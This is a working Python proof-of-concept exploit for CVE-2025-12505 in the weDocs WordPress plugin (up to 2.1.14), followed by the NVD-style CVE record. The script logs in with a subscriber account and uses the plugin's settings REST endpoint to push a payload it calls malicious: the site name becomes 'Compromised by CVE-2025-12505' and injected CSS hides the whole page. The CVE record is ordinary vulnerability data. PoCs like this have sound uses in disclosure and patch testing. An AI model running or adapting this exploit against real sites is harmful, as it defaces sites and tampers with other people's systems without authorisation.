CVE-2025-12505

import requests import sys # CVE-2025-12505 PoC - weDocs Plugin Unauthorized Settings Modification # Target: WordPress site with weDocs plugin <= 2.1.14 def exploit_wedocs(target_url, username, password): """ Exploit weDocs plugin permission bypass vulnerability Allows authenticated users with subscriber role to modify global settings """ session = requests.Session() # Step 1: Authenticate with subscriber account login_url = f"{target_url}/wp-login.php" auth_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': target_url } resp = session.post(login_url, data=auth_data, allow_redirects=True) if 'wordpress_logged_in' not in session.cookies.get_dict(): print("[-] Authentication failed") return False print("[+] Authentication successful") # Step 2: Modify plugin settings via REST API api_url = f"{target_url}/wp-json/we-docs/v1/settings" # Malicious settings payload settings_payload = { 'general': { 'site_name': 'Compromised by CVE-2025-12505', 'custom_css': 'body { display: none; }' } } headers = { 'Content-Type': 'application/json', 'X-WP-Nonce': session.cookies.get('wordpress_rest_api_cookie', '') } # Attempt to modify settings (this should require admin privileges) resp = session.post(api_url, json=settings_payload, headers=headers) if resp.status_code in [200, 201]: print("[+] Settings modified successfully - VULNERABLE!") print(f"[+] Response: {resp.text}") return True else: print(f"[-] Request failed with status: {resp.status_code}") return False if __name__ == "__main__": if len(sys.argv) < 4: print(f"Usage: python {sys.argv[0]} <target_url> <username> <password>") sys.exit(1) exploit_wedocs(sys.argv[1], sys.argv[2], sys.argv[3])

{"cve": {"id": "CVE-2025-12505", "sourceIdentifier": "[email protected]", "published": "2025-12-06T05:16:43.790", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The weDocs plugin for WordPress is vulnerable to unauthorized access in all versions up to, and including, 2.1.14. This is due to the plugin not properly verifying that a user is authorized to perform an action in the create_item_permissions_check function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to modify global plugin settings."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-285"}]}], "references": [{"url": "https://github.com/weDevsOfficial/wedocs-plugin/blob/develop/includes/API/SettingsApi.php", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/wedocs/tags/2.1.13/includes/API/SettingsApi.php#L115", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/wedocs/tags/2.1.13/includes/API/SettingsApi.php#L179", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3403375%40wedocs%2Ftrunk&old=3382516%40wedocs%2Ftrunk&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/3ec54ec6-0ff1-4290-85d0-d691a1832627?source=cve", "source": "[email protected]"}]}}